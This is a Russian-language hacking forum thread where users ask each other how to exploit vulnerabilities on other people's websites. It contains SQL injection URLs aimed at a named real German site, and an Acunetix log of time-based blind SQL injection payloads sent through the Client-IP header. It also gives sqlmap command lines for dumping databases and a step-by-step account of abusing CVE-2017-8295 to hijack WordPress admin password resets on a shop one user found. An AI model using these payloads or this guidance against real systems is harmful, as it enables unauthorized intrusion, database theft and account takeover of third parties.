Ваши вопросы по уязвимостям.

смотрим:

Code:

baustelle.viernheim.de/index.php?id=83&rt=single&typ=img&no_cache=1&uid=10 and 1=(select 1 union select 1) -- g
http://baustelle.viernheim.de/index.php?id=83&rt=single&typ=img&no_cache=1&uid=10%20and%201%20in%20(1,2,3)%20--%20g
http://baustelle.viernheim.de/index.php?id=83&rt=single&typ=img&no_cache=1&uid=10%20and%201%20in%20(1,2,3)%20--%20g%20union%20select%201,2,3

говорит о том что вафа там и нету. Ни селект ни запятая не режется.

 

Сканирую сканером сайт. Сегодня акунетикс выдал такой лог

Code:

The vulnerability affects http://www.site.com/login.php , Client-IP

Discovered by /Scripts/PerScheme/Blind_Sql_Injection.script

Attack details

HTTP Header input Client-IP was set to 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z

Tests performed:

    0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z => 3.943
    0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.737
    0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.765
    0"XOR(if(now()=sysdate(),sleep(9),0))XOR"Z => 9.925
    0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.727
    0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.741
    0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.756
    0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.85
    0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.718
HTTP request

GET /login.php HTTP/1.1
Referer: https://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Client-IP: 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z

Пишет Blind SQL. Как крутить такое?

 

Логично как пишет, Blind SQL! Попробуйте через SqlMap c параметрами --technique=B --level=5 --risk=3

 

Я не совсем понял как правильно скормить запрос мапу..
sqlmap -u http://www.site.com/login.php --technique=B --level=5 --dbs так?

 

sqlmap -u http://www.site.com/login.php --technique=B --level=5 --dbs --form

 

Ты уже задавал данный вопрос. Вариантов не так много
./ .\ \\ // ? /[…]//

 

пробовал нечего не помогло

 

Изучить движок, исходники, возможно есть другие файлы, которые не доступны с вэба, но в них есть баги, проинклудить их...

 

Это тоже пробовали, нечего интересного) Интересует что то типо NULL байт, как было в старых версиях

 

Еще хотел спросить. А в GET запросе можно мапу задать уязвимый параметр, чтобы он по нему шел? В POST можно, а с GET возможно? Акунетикс выдаёт этот параметр - Client-IP

 

Там где угодно можно задать, тут с подобными вопросами вам уже в ветку
Вопросы по SQLMap

 

Кто знает, как реализовать этот експлойт https://www.exploit-db.com/exploits/41963/
Нашел шоп с этой уязвимостью, немного разобрал, что можно сбросить пасс админа с помощью этого скрипта без авторизации. Перепробовав все варианты, ничего не выходит. Кто сталкивался?

 

Там много зависимостей для этого уязвимости, нужно что бы мыло админа было [email protected] только тогда ты сможешь отправить на свое мыло его код эсплойт ест на гитхабе загугль
CVE:2017-8295 github на питоне будет

 

С чего вы решили что мыло админа должно быть [email protected]? Вот первоисточник. Что-бы сбросить пасс, вам нужно 3 вещи:

1. Знать логин админа
2. Вам надо создать ящик [email protected]ваш-домейн.нет
   
3. Вам нужно, что-бы ящик самого админа был не доступен или же это мыло с кодом для сброса пароля было откинуто и вам на ящик под вашим контролем ([email protected]ваш-домейн.нет) пишла копия этого мыла.

Тогда вы сможете с помощью ссылки в мыле скинуть пароль админа.

 

ну на заборе тоже сам знаешь что написано, попробуй и поймешь

 

Что на заборе написано, что мыло вордпресс админа должно "[email protected]" быть?

 

Ну ты проведи атаку и увидишь что успеха будет ноль!Уязвимость связана с подменой host сервера если у админа мыло [email protected] и твой майл сервер ebanko.ru а жертва vk.com, то у тебу получиться подменить только gmail.com на ebanko.ru а eblanfandor9 ты не как не заменишь.Если что то не пробывал и не пробивал не стоит сувать свой нос отталкиваясь от мануалов.

 

Ребята, заканчивайте, есть public disclosure, там всё чётко написано. Этот спор, с выяснениями, кто еблан, а кто красавчик, и что на заборе написано, ни к чему хорошему не приведёт. Если хочется, кайфуйте в ЛС.

Уязвимость, очень редкая, должна совпасть куча зависимостей, но если по простому:

1. Настройка виртуального хоста веб-сервера Apache, должна допускать возможность Host Header Injection
2. sendmail не должен доставить письмо по легитимному адресу (DoS, DDoS, DNS spoofing, etc). Либо мыло админа должно быть невалидным.
   
3. HTTP_HOST атакующего должен уметь принимать почту (привет temp-mail.org)

@ci0b2n1feec, есть большой опыт эксплуатации подобных уязвимостей? Комьюнити скажет только спасибо, если просветите и покажите как нужно и почему оно так.

 

НЕ стоит хамить.

я этого нигде и не писал. Прочтите внимательно что я написал.
Если вы не понимаете атаку, то не это не значит что она не работает. Там несколько условий для успешного выполнения. Ещё раз на пальцах:

1. Для сбросе пароля вам нужно знать мыло админа. Допустим оно [email protected]
2. При отправке мыло на сброс пароля отправляется от адреса [email protected] на адрес [email protected]. В этой версии вордпресса при отправке POST-запроса заменяется в мыле отправителя домейн на то что вы передали в заголовке Host. Допустим там будет стоять Host: super-mail.ru. Тогда админу на почту [email protected] вышлется мыло от [email protected]super-mail.ru.
3. Ну и теперь самое сложное, это мыло либо должно быть заблокировано майл-сервером админа и отброшено назад отправителю ([email protected]super-mail.ru) либо админ должен ответить с копией этого мыла отправителю (ещё менее вероятно). И только тогда получаем заветное мыло с кодом сброса пароля.

Ясен пень что это очень редко где сработает.

 

Expression Language injection
Есть мануалы подробные, или есть люди которые смогут раскрутить ?